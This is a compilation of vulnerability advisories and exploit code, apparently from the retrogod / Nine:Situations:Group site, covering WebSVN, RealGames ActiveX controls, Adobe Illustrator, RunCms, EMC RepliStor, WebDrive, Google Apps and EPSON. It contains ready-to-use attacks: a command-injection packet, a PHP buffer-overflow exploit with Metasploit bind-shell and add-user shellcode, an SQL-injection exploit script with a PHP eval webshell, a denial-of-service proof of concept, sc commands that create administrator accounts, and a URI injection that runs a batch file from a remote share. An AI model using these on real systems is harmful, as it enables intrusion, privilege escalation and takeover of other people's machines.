(TrustedHost)aobj[0]; } .. a request to the FlashServiceImpl Axis2 Web Service is originated note that the ip address originating the request is
WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability
WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability tested against: Microsoft Windows Server R2 SP2 PHP 5.3.6 VC9 with magic_quotes_gpc = off (default) Apache 2.2.17 VC9 Introduction: This is a very special vulnerabilty, given the incredibly high number of machines involved. This can be verified by submitting the following queries to Google: Powered by WebSVN * and Subversion Powered by WebSVN 2.3.2 and Subversion homepage url: http://websvn.tigris.org/ Description says: WebSVN offers a view onto your subversion repositories that's been designed to reflect the Subversion methodology. You can view the log of any file or directory and see a list of all the files changed, added or deleted in any given revision. You can also view compare two versions of a file so as to see exactly what was changed in a particular revision. Since it's written using PHP, WebSVN is very portable and easy to install. Vulnerabilty: Without prior authentication, if the 'allowDownload' option is enabled in config.php, meaning that a tarball download is allowed across all the repositories (not uncommon), an attacker can invoke the dl.php script and passing a well formed 'path' argument to execute arbitrary commands against the underlying operating system. Vulnerable code: look at dl.php, lines 114-139: .. } else { @unlink($tempDir); mkdir($tempDir); // Create the name of the directory being archived $archiveName = $path; $isDir = (substr($archiveName, -1) == '/'); if ($isDir) { $archiveName = substr($archiveName, 0, -1); } $archiveName = basename($archiveName); if ($archiveName == '') { $archiveName = $rep-name; } $plainfilename = $archiveName; $archiveName .= '.r'.$rev; // Export the requested path from SVN repository to the temp directory $svnExportResult = $svnrep-exportRepositoryPath($path, $tempDir.DIRECTORY_SEPARATOR.$archiveName, $rev, $peg); if ($svnExportResult != 0) { header('HTTP/1.x 500 Internal Server Error', true, 500); error_log('svn export failed for: '.$archiveName); print 'svn export failed for '.xml_entities($archiveName).'.'; removeDirectory($tempDir); exit(0); } .. then look at exportRepositoryPath() function inside ./include/svnlook.php, lines 879-896: .. // {{{ exportDirectory // // Exports the directory to the given location function exportRepositoryPath($path, $filename, $rev = 0, $peg = '') { $cmd = $this-svnCommandString('export', $path, $rev, $peg).' '.quote($filename); //--- $retcode = 0; execCommand($cmd, $retcode); //-- if ($retcode != 0) { global $lang; error_log($lang['BADCMD'].': '.escape($cmd)); } return $retcode; } // }}} .. again look at execCommand() function inside ./include/command.php, lines 107-123: .. // {{{ execCommand function execCommand($cmd, $retcode) { global $config; // On Windows machines, the whole line needs quotes round it so that it's // passed to cmd.exe correctly // Since php 5.3.0 the quoting seems to be done internally if ($config-serverIsWindows version_compare(PHP_VERSION, '5.3.0alpha') === -1) { $cmd = ''.$cmd.''; // nonsense ... } return @exec($cmd, $tmp, $retcode); //- boom } // }}} .. also, look at quote() inside ./include/command.php: .. // {{{ quote // // Quote a string to send to the command line function quote($str) { global $config; if ($config-serverIsWindows) { return ''.$str.''; //--- !!! } else { return escapeshellarg($str); // this should work properly on Linux instead } } // }}} .. Example packet: POST /websvn/dl.php HTTP/1.1 User-Agent: Mozilla/4.0 Host: 192.168.0.1 Accept: */* Cookie: storedsesstemplate=.%00; storedtemplate=.%00; Content-Length: 42 Content-Type: application/x-www-form-urlencoded path=./../../x%22%7Cver%3Esuntzu.txt%7C%22 the resulting command line is like this: c:\SVN\bin\svn --non-interactive --config-dir C:\SVN\tmp\export URL%20to%20repository%20%28e.g.%20file:///d:/SubVersion/proj%29./../../x%22%7Cver%3Esuntzu.txt%7C%22@ C:\Documents and Settings \Administrator\Local Settings\Temp\web554.tmp\x|versuntzu.txt|.r
Re: ZDI-11-117: McAfee Firewall Reporter GeneralUtilities.pm isValidClient Authentication Bypass Vulnerability
McAfee stated: [quote] Impact of Vulnerability: Disabling Anti-Virus, adding unwanted exclusions [/quote] When submitting this bug to ZDI, I made availiable two reliable post-bypass proof-of-concepts: - a static perl code injection exploit using the 'args' argument of saveTopImagelogos.cgi - an upload and execute exploit using uploadFile.cgi In both cases, the result was remote command execution with SYSTEM privileges. This was tested against the default Apache installation. ZDI did not acquire post-auth vulnerabilities, so I was considering to disclose them after the patch was out but, in the end, not. I'm saying this to allow people to classify this vulnerability with the correct metrics. rgod
RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution and Code Execution Vulnerabilities
RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution and Code Execution Vulnerabilities tested against Internet Explorer 9, Vista sp2 download url: http://www.gamehouse.com/ background: When choosing to play with theese online games ex. the game called My Farm Life (see url: http://www.gamehouse.com/download-games/my-farm-life ) you download an installer called GameHouse-Installer_am-myfarmlife_gamehouse_.exe This setup program installs an ActiveX with the following settings: CLSID: {80AB3FB6-9660-416C-BE8D-0E2E8AC3138B} Progid: StubbyUtil.ShellCtl.1 Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll Safe For Initialization (Registry): True Safe For Scripting (Registry): True This control is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control from remote. vulnerability: This control has four methods implemented insecurely: ShellExec() - allows to launch arbitrary commands ShellExecRunAs() - allows to launch arbitrary commands CreateShortcut() - allows to create arbitrary executable files inside the automatic startup folders CopyDocument() - allows to copy arbitrary executable files from a remote network share to local folders, ex. automatic startup folders other attacks are possible including information disclosure and file deletion, see typelib: class IShellCtl { /* GUID={0D60A064-2009-4623-8FC1-F99CAC01037E} */ /* DISPID=1610612736 */ function QueryInterface( /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_PTR [26] [out] -- VT_PTR [26] */ $ppvObj ) { } /* DISPID=1610612737 */ /* VT_UI4 [19] */ function AddRef( ) { } /* DISPID=1610612738 */ /* VT_UI4 [19] */ function Release( ) { } /* DISPID=1610678272 */ function GetTypeInfoCount( /* VT_PTR [26] [out] -- VT_UINT [23] */ $pctinfo ) { } /* DISPID=1610678273 */ function GetTypeInfo( /* VT_UINT [23] [in] */ $itinfo, /* VT_UI4 [19] [in] */ $lcid, /* VT_PTR [26] [out] -- VT_PTR [26] */ $pptinfo ) { } /* DISPID=1610678274 */ function GetIDsOfNames( /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_PTR [26] [in] -- VT_PTR [26] */ $rgszNames, /* VT_UINT [23] [in] */ $cNames, /* VT_UI4 [19] [in] */ $lcid, /* VT_PTR [26] [out] -- VT_I4 [3] */ $rgdispid ) { } /* DISPID=1610678275 */ function Invoke( /* VT_I4 [3] [in] */ $dispidMember, /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_UI4 [19] [in] */ $lcid, /* VT_UI2 [18] [in] */ $wFlags, /* VT_PTR [26] [in] -- ? [29] */ $pdispparams, /* VT_PTR [26] [out] -- VT_VARIANT [12] */ $pvarResult, /* VT_PTR [26] [out] -- ? [29] */ $pexcepinfo, /* VT_PTR [26] [out] -- VT_UINT [23] */ $puArgErr ) { } /* DISPID=1 */ function CreateShortcut( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $name, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $target, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $icon, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $workingDir, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $args ) { /* method CreateShortcut */ } /* DISPID=2 */ function DeleteShortcut( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $name ) { /* method DeleteShortcut */ } /* DISPID=3 */ /* VT_BSTR [8] */ function ModuleFileName( ) { /* method ModuleFileName */ } /* DISPID=4 */ /* VT_BSTR [8] */ function GetSpecialFolder( /* VT_UI4 [19] [in] */ $__MIDL_0025 ) { /* method GetSpecialFolder */ } /* DISPID=5 */ /* VT_BOOL [11] */ function CheckWnd( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0026 ) { /* method CheckWnd */ } /* DISPID=6 */ /* VT_BSTR [8] */ function ExistingTPS( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0028 ) { /* method ExistingTPS */ } /* DISPID=7 */ function SetWorkingDir( /* VT_PTR [26] [in] -- VT_BSTR [8]
RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution Vulnerabilities
RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution Vulnerabilities tested against Internet Explorer 9, Vista sp2 download url: http://www.gamehouse.com/ background: When choosing to play with theese online games ex. the game called My Farm Life (see url: http://www.gamehouse.com/download-games/my-farm-life ) you download an installer called GameHouse-Installer_am-myfarmlife_gamehouse_.exe This setup program installs an ActiveX with the following settings: CLSID: {5818813E-D53D-47A5-ABBB-37E2A07056B5} Progid: StubbyUtil.ProcessMgr.1 Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll Safe For Initialization (Registry): True Safe For Scripting (Registry): True This control is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control from remote. vulnerability: This control has four methods implemented insecurely: CreateVistaTaskLow() - allows to launch arbitrary commands Exec()- allows to launch arbitrary commands ExecLow() - allows to launch arbitrary commands ShellExec() - allows to launch arbitrary executables other attacks are possible , see typelib: class IProcessMgr { /* GUID={860450DB-79C1-44E4-96E0-C89144E4B444} */ /* DISPID=1610612736 */ function QueryInterface( /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_PTR [26] [out] -- VT_PTR [26] */ $ppvObj ) { } /* DISPID=1610612737 */ /* VT_UI4 [19] */ function AddRef( ) { } /* DISPID=1610612738 */ /* VT_UI4 [19] */ function Release( ) { } /* DISPID=1610678272 */ function GetTypeInfoCount( /* VT_PTR [26] [out] -- VT_UINT [23] */ $pctinfo ) { } /* DISPID=1610678273 */ function GetTypeInfo( /* VT_UINT [23] [in] */ $itinfo, /* VT_UI4 [19] [in] */ $lcid, /* VT_PTR [26] [out] -- VT_PTR [26] */ $pptinfo ) { } /* DISPID=1610678274 */ function GetIDsOfNames( /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_PTR [26] [in] -- VT_PTR [26] */ $rgszNames, /* VT_UINT [23] [in] */ $cNames, /* VT_UI4 [19] [in] */ $lcid, /* VT_PTR [26] [out] -- VT_I4 [3] */ $rgdispid ) { } /* DISPID=1610678275 */ function Invoke( /* VT_I4 [3] [in] */ $dispidMember, /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_UI4 [19] [in] */ $lcid, /* VT_UI2 [18] [in] */ $wFlags, /* VT_PTR [26] [in] -- ? [29] */ $pdispparams, /* VT_PTR [26] [out] -- VT_VARIANT [12] */ $pvarResult, /* VT_PTR [26] [out] -- ? [29] */ $pexcepinfo, /* VT_PTR [26] [out] -- VT_UINT [23] */ $puArgErr ) { } /* DISPID=1 */ /* VT_BOOL [11] */ function Exec( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $mod, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $cmdline, /* VT_BOOL [11] [in] */ $__MIDL_0097, /* VT_BOOL [11] [in] */ $__MIDL_0098, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0099 ) { /* method Exec */ } /* DISPID=2 */ /* VT_BOOL [11] */ function IsFinished( ) { } /* DISPID=3 */ /* VT_UI4 [19] */ function CreateNamedMutex( /* VT_BSTR [8] [in] */ $__MIDL_0102 ) { } /* DISPID=4 */ function ReleaseMutex( /* VT_UI4 [19] [in] */ $__MIDL_0104 ) { } /* DISPID=5 */ function CloseMutex( /* VT_UI4 [19] [in] */ $__MIDL_0105 ) { } /* DISPID=6 */ /* VT_BOOL [11] */ function ObtainMutex( /* VT_UI4 [19] [in] */ $__MIDL_0106 ) { } /* DISPID=7 */ /* VT_BOOL [11] */ function WaitOnMutex( /* VT_UI4 [19] [in] */ $__MIDL_0108, /* VT_INT [22] [in] */ $__MIDL_0109 ) { } /* DISPID=8 */ function CloseEvent( /* VT_UI4 [19] [in] */ $__MIDL_0111 ) { } /* DISPID=9 */ function FireEvent( /* VT_UI4 [19] [in] */ $__MIDL_0112 ) { } /* DISPID=10 */ /* VT_UI4 [19] */ function
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) Overlong DSC Comment Buffer Overflow Exploit
?php /* Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ An overlong string as DSC comment (more than 42000 bytes) results in a direct EIP overwrite. Exception is first-chance so the program will never crash. At the moment of the redirection EAX and ESI are user-controlled. This portion of the buffer begins with '%' (it is the next DSC comment) but as you can see the resulting pattern is nop-equivalent. Tested and working against xp sp3 change the call esi if you need, must be alphabetic I used a call esi from comctl32.dll on xp sp3, change if needed. Usage: php 9sg_illu.php then double-click on the resulting 9sg.eps file it will bind a shell on port change the shellcode for your needs even. */ # windows/adduser - 446 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, USER=adobe, PASS=kills $_scode_i = \xda\xc9\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49 . \x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a . \x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42 . \x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75 . \x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x43\x30\x45\x50 . \x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48 . \x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f . \x51\x30\x45\x51\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b . \x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4d\x54 . \x49\x50\x44\x34\x45\x57\x49\x51\x48\x4a\x44\x4d\x43\x31 . \x49\x52\x4a\x4b\x4a\x54\x47\x4b\x46\x34\x47\x54\x43\x34 . \x43\x45\x4a\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b . \x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c . \x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b . \x4d\x59\x51\x4c\x47\x54\x44\x44\x48\x43\x51\x4f\x50\x31 . \x4b\x46\x43\x50\x46\x36\x45\x34\x4c\x4b\x47\x36\x50\x30 . \x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d . \x4c\x4b\x42\x48\x43\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50 . \x42\x4a\x46\x30\x42\x48\x4c\x30\x4d\x5a\x44\x44\x51\x4f . \x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51\x47\x4b\x4f . \x4d\x37\x42\x43\x42\x4d\x42\x44\x46\x4e\x45\x35\x43\x48 . \x42\x45\x51\x30\x46\x4f\x45\x33\x47\x50\x42\x4e\x42\x45 . \x42\x54\x51\x30\x43\x45\x43\x43\x45\x35\x43\x42\x51\x30 . \x45\x31\x45\x34\x42\x4f\x42\x42\x43\x55\x47\x50\x42\x4b . \x45\x39\x42\x4c\x42\x4c\x42\x53\x51\x30\x46\x4f\x51\x51 . \x47\x34\x50\x44\x51\x30\x47\x56\x51\x36\x51\x30\x42\x4e . \x42\x45\x44\x34\x47\x50\x42\x4c\x42\x4f\x42\x43\x45\x31 . \x42\x4c\x43\x57\x43\x42\x42\x4f\x44\x35\x44\x30\x47\x50 . \x47\x31\x42\x44\x42\x4d\x42\x49\x42\x4e\x45\x39\x42\x53 . \x43\x44\x42\x52\x45\x31\x43\x44\x42\x4f\x44\x32\x44\x33 . \x51\x30\x45\x31\x45\x34\x42\x4f\x43\x52\x42\x45\x47\x50 . \x46\x4f\x47\x31\x47\x34\x51\x54\x45\x50\x41\x41; # windows/shell_bind_tcp - 696 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, LPORT=, RHOST= $_scode_ii = \x89\xe5\xda\xd0\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49 . \x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51 . \x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32 . \x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41 . \x42\x75\x4a\x49\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38 . \x4b\x49\x4b\x4f\x4b\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c . \x46\x44\x51\x34\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c . \x43\x35\x43\x48\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x42\x38 . \x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b . \x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39 . \x4e\x4c\x4d\x54\x49\x50\x43\x44\x45\x57\x49\x51\x49\x5a . \x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x50\x54 . \x51\x34\x46\x48\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47\x54 . \x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b . \x51\x4f\x45\x4c\x43\x31\x4a\x4b\x45\x53\x46\x4c\x4c\x4b . \x4b\x39\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x46\x51 .
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
?php /* RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit by Nine:Situations:Group::bookoo site: http://retrogod.altervista.org/ software site: http://www.runcms.org/ vulnerable code in /modules/forum/post.php near lines 16-34 : ... if ( empty($_POST['forum']) ) { redirect_header(index.php, 2, _MD_ERRORFORUM); exit(); } else if ( empty($_POST['message']) ) { redirect_header(javascript:history.go(-1), 2, _MD_ERRORMESSAGE); exit(); } else { $sql = SELECT * FROM .$bbTable['forums']. WHERE forum_id = .$_POST['forum'].; // !!! if (!$result = $db-query($sql)) { redirect_header(index.php, 2, _MD_CANTGETFORUM); exit(); } ... 'forum' variable is taken from $_POST[] array and inserted in a sql query without prior santization and without being surrounded by quotes. Then you can subsequently manipulate this query in /modules/forum/class/class.permissions.php by passing another 'UNION SELECT' as first argument of the 'UNION SELECT' passed to post.php (a little bit complex uh? $forum_id is user controlled ...) 100-102: ... if ($user_id 0) { $sql = SELECT * FROM .$bbTable['forum_access']. WHERE forum_id=$forum_id AND user_id=$user_id; ... the result is that you can extract the sha1 hash of the admin user and the corrispondent salt. If you cannot decrypt the hash... you can always hijack an active session (meaning the admin user must be logged in) by building the admin cookie, no check ex. on ip address. To do that you need the table prefix. A default one does not exist, but exists a 'suggested one' when installing the cms, which is 'runcms', but an empty one is not allowed. However with MySQL 5.0 you can have the table prefix by interrogating information_schema.TABLES This whole thing works regardless of php.ini settings but you need: - a valid user account Register! - an existing row in [prefix]_forum_forums table - an existing row in [prefix]_forum_forum_access table which is very possible against a runcms installation with a working and active forum. Also, you could manipulate the query in post.php to export a php shell through 'INTO DUMPFILE' method, but you need FILE privilege and magic_quotes_gpc = off. It's also possible to disclose absolute path in certain conditions (see error_reporting) by polluting a preg_match() argument: http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1 http://[host]/[path_to_runcms]/userinfo.php?uid[]=1 Final notes: This sql injection vulnerability has to be considerated as high risk because as ADMIN you can inject php code by the Filter/Banning functionalities, ex: click 'Administration Menu', then 'System Admin', then click on the Filters/Banning icon, then 'Prohibited: Emails' Now you can edit the /modules/system/cache/bademails.php file Type in: ?php eval($_GET[c]);? then you launch commands: http://[host]/[path_to_runcms]/modules/system/cache/bademails.php?c=system(dir); you can do the same with all filter utilities ... */ $err[0] = [!] This script is intended to be launched from the cli!; $err[1] = [!] You need the curl extesion loaded!; function my_header() { print (\x52\x75\x6e\x43\x6d\x73\x20\x76\x2e\x32\x6d\x31\x20\x2f\x6d\x6f\x64\x75\x6c\x65\x73\x2f\x66\x6f\x72\x75\x6d\x2f\x70\x6f\x73\x74\x2e\x70\x68\x70\x20\x2d\x20\x27\x66\x6f\x72\x75\x6d\x27\x20\x72\x65\x6d\x6f\x74\x65\x20\x73\x65\x6d\x69\x2d\x62\x6c\x69\x6e\x64\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\xd\xa\x62\x79\x20\x4e\x69\x6e\x65\x3a\x53\x69\x74\x75\x61\x74\x69\x6f\x6e\x73\x3a\x47\x72\x6f\x75\x70\x3a\x3a\x62\x6f\x6f\x6b\x6f\x6f\xd\xa\x73\x69\x74\x65\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x74\x72\x6f\x67\x6f\x64\x2e\x61\x6c\x74\x65\x72\x76\x69\x73\x74\x61\x2e\x6f\x72\x67\x2f\xd\xa\n); } my_header(); if (php_sapi_name() cli) { die($err[0]); } if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl(php_curl.dll) ? die($err[1]) : print([*] curl loaded\n); } else { !dl(php_curl.so) ? die($err[1]) : print([*] curl loaded\n); } } function syntax() { print ( Syntax: php .$argv[0]. [host] [path] [user] [pass] [OPTIONS] \n. Options: \n. --port:[port] - specify a port
EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of service
?php /* EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of service poc by Nine:Situations:Group::bellick */ $host = 192.168.0.1; $port = 7144; $_sock = fsockopen($host, $port, $errno, $errstr, 2); if (!$fp) { echo $errstr ($errno)\n; } else { $_p = \x54\x93\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41. \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41. \x41\x41\x41\x41; fputs($_sock, $_p); fclose($_sock); } ? original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html
South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges
South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges by Nine:Situations:Group::bellick site: http://retrogod.altervista.org/ Software site: http://www.webdrive.com/ Download location: http://www.webdrive.com/download/index.html Tested against: South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3 The WebDrive Service is installed with an empty security descriptor. A malicious user can stop the service, then invoke the sc config command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges ex., run theese commands as a limited user: sc stop WebDriveService sc config WebDriveService binPath= cmd /c net user southriver kills /add net localgroup Administrators southriver /add sc start WebDriveService runas /noprofile /user:%COMPUTERNAME%\southriver cmd now login as administrator with password kills mitigation: the security descriptor of the service is like this: C:\sc sdshow WebDriveService D: change the security descriptor like the following: c:\sc sdset WebDriveService D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY) [SC] SetServiceObjectSecurity SUCCESS original url: http://retrogod.altervista.org/9sg_south_river_priv.html
google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (IE)
google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (Internet Explorer) by nine:situations:group::pyrokinesis site: http://retrogod.altervista.org/ software site: http://pack.google.com/intl/it/pack_installer.html tested against: Internet Explorer 8, windows xp sp3 Internet Explorer 7, windows xp sp3 Google Chrome 2.0.172.43 vulnerability: through the vulnerable googleapps.url.mailto:// deprecated uri handler, registered as follows: [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto] @=Google Apps URL EditFlags=hex:02,00,00,00 FriendlyTypeName=Google Apps URL URL Protocol= [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\DefaultIcon] @=C:\\Programmi\\Google\\Google Apps\\googleapps.exe,0 [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell] [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open] [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open\command] @=C:\\Programmi\\Google\\Google Apps\\googleapps.exe --mailto.google.com=\%1\ is possibile, against all versions of Internet Explorer, by injecting the --domain= switch for the googleapps.exe executable to pass arbitrary switches to the Google Chrome chrome.exe executable (which is subsequently launched to open the gmail pages), example: the --renderer-path and --no-sandbox switches Through them is possible to launch an arbitrary executable from the local system: googleapps.url.mailto://%20--domain=--what%20--renderer-path=calc%20--no-sandbox%20--x/ or to launch an arbitrary batch file from a remote network share: googleapps.url.mailto://%20--domain=--x%20--renderer-path=\\192.168.0.1\uncshare\sh.bat%20--no-sandbox%20--x/ the resulting command line for chrome.exe is in this case: C:\Programmi\Google\Chrome\Application\chrome.exe --app=https://mail.google.com/a/--x --renderer-path=\\192.168.0.1\uncshare\sh.bat --no-sandbox --x//?view=cmfs=1to=googleapps.url.mailto%3A%2F%2Frlz=1R6GPCK_en___IT344 which leverages the remote command execution issue Mitigation: unregister the uri handler by deleting the mentioned registry keys original url: http://retrogod.altervista.org/9sg_google_apps_uri.html
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges by Nine:Situations:Group::bellick site: http://retrogod.altervista.org/ Tested on Microsoft Windows XP SP3 The Adobe Active File Monitor V8 service is installed with an improper security descriptor. A malicious user of the Users group (which on xp means a limited account) can stop the service, then invoke the sc config command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges ex., run theese commands as a limited user: sc stop AdobeActiveFileMonitor8.0 sc config AdobeActiveFileMonitor8.0 binPath= cmd /c net user adobe kills /add net localgroup Administrators adobe /add sc start AdobeActiveFileMonitor8.0 runas /noprofile /user:%COMPUTERNAME%\adobe cmd now login as administrator with password kills mitigation: the security descriptor of the service is like this: C:\sc sdshow AdobeActiveFileMonitor8.0 D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) note the WO and WD permission for Everyone (!) change the security descriptor like the following: c:\sc sdset AdobeActiveFileMonitor8.0 D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY) [SC] SetServiceObjectSecurity SUCCESS readings, interesting article: http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html
EPSON Status Monitor 3 local privilege escalation vulnerability
--- EPSON Status Monitor 3 local privilege escalation vulnerability by Nine:Situations:Group::bruiser site: http://retrogod.altervista.org/ After that pyrokinesis found: http://www.milw0rm.com/exploits/9199 I prepared a tool to check for weak permissions and I come out with this: C:\sc qc EPSON_EB_RPCV4_01 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EPSON_EB_RPCV4_01 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : EPSON V5 Service4(01) DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem C:\CACLS C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE Everyone:F --[ :( !!!] C:\SC QC EPSON_PM_RPCV4_01 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EPSON_PM_RPCV4_01 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : EPSON V3 Service4(01) DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem C:\CACLS C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE Everyone:F --[ :( !!!] The executable files are installed with full control for Everyone; replace them with your favourite rootkit. They are carried by an EPSON STYLUS SX100 drivers cd. C'mon guys, no need for an exploit code, it can be triggered by the availiable command line tools. original url: http://retrogod.altervista.org/9sg_EPSON_local.html
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
